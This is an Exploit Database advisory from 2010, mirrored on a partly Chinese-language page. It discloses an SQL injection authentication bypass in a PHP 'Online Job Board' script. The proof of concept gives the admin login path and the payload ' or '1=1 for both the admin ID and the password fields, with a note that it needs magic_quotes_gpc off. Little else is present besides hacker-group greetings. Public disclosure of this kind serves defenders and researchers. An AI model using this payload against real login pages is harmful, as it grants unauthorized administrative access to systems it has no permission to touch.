Online Job Board – Authentication Bypass

• Exploit Database
• 9 阅读

• 作者： cr4wl3r
  日期： 2010-05-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12691/

• \#'#/
  (-.-)
   --------------------oOO---(_)---OOo-----------------------------
   |Online Job Board (Auth Bypass) SQL Injection Vulnerability|
   | (works only with magic_quotes_gpc = off) |
   ----------------------------------------------------------------
  [!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
  [!] Homepage: http://h4ckb0x.org/
  [!] Script: http://hostnomi.net/detail.php?spid=15
  
  [!] Dork: no dork for script kiddies :p~
  [!] Remote: yes
  
  [x] PoC:
  
  http://h4ckb0x.org/siteadmin/index.php
  
  Admin ID: ' or '1=1
  Password: ' or '1=1
  
  [~] Greetz: r0073r, str0ke, opt!x hacker, xoron, Ricardo Almeida, cyberlog, irvian, zreg, k1n9k0ng, letjen, team_elite, wiro sableng, samuel MC, EA ngel, and all my friend
  [~] Special to: Valentin Hobel (Happy Birthday brotha) ;)
  
  [~] Visit: inj3ct0r.com, exploit-db.com for more exploits and to update the new exploits
  [~] Regards: cr4wl3r